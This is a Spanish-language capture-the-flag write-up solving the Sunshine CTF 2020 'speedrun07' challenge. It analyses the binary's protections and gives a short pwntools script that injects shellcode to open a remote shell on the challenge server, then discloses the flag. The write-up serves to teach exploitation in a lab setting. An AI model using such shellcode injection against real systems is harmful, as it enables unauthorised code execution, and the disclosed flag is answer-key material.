Binary Exploitation (XIII): Solución Reto Sunshine CTF 2020 "speedrun07"

Solución a otro reto de la categoría 'Binary Exploitation' de la competición Sunshine CTF 2020.

En esta entrada la solución al desafío que lleva por título "speedrun07", y que, en mi opinión, presenta un nivel de dificultad bajo (★★☆☆☆).

- Enunciado:

- Solución: Se proporciona un archivo ejecutable (chall_07) y lo primero que hago es ejecutarlo; incluyo una cadena larga ('AAA…A') y después otra ('AAA…A'), y veo que el binario es vulnerable a un desbordamiento de ‘buffer’ (en inglés, ‘buffer overflow’):

Después, compruebo los mecanismos de seguridad del binario utilizando ‘checksec’:

Se trata de un binario de 64 bits, y como se ve en la figura anterior NX está deshabilitado, por lo que podré inyectar ‘shellcode’ en la pila (en inglés, ‘stack’) para ejecutarlo, y PIE está habilitado, lo que aleatoriza la dirección base del binario para dificultar el uso por un atacante de sus funciones y de ‘gadgets’ del propio binario (en español dispositivos, y que, en este caso, son pequeños fragmentos de código ya presentes en el binario).

Como también se ve, entre las protecciones de este binario se ha detectado la existencia de un canario, que es un valor, generalmente aleatorio, que se coloca entre un ‘buffer’ y los datos de la pila adyacentes al mismo para detectar los desbordamientos del ‘buffer’, de tal forma que al final de una función se comprueba si se ha modificado su valor y, caso de que así sea, sería indicativo de que se ha producido un desbordamiento del ‘buffer’, ya que el valor del canario sería el primer dato en corromperse, y se podrían tomar las acciones oportunas, por ejemplo, advertir de esta circunstancia y dar por finalizado el programa.

Decompilo el binario con ’Ghidra’:

Veo que en main() se utilizan fgets() en lugar de gets() lo que, en principio, evitaría un desbordamiento de ‘buffer’ y, además, al final, se comprueba si el canario ha cambiado de valor, con objeto de prevenir un desbordamiento de ‘buffer’.

Entiendo que en este caso realmente no se produce un desbordamiento de ‘buffer’, el error ‘Segmentation fault (core dumped)’ que se muestra al ejecutar el programa es consecuencia de la segunda fgets() que se ve en main() y de la posterior llamada a la función ubicada en la dirección que contiene la variable local_d8, es decir, creo que ese error se produce siempre, con independencia de lo que se incluya al ejecutarse el binario. Por tanto, en este caso, el canario es totalmente inútil, ya que ni siquiera se llega a verificar si ha cambiado de valor.

No obstante lo dicho, la solución a este reto es muy fácil, ya que basta con incluir en local_d8 un ‘shellcode’ para abrir una ‘shell’.

Para implementar el ataque creo un pequeño ‘exploit’ mediante el siguiente ‘script’ en python:

#!/usr/bin/env python3

from pwn import *

context.binary = ELF('./chall_07')

p = remote('chal.2020.sunshinectf.org', 30007)

p.sendlineafter('In the land of raw humanity','')

payload = asm(shellcraft.sh())

p.sendline(payload)

p.interactive()

Lo ejecuto:

A partir de que se abra la ‘shell’, lo único que queda por hacer es buscar la flag en el servidor. Veo que hay un fichero llamado flag.txt que contiene la solución a este reto: sun{sidewinder-a80d0be1840663c4}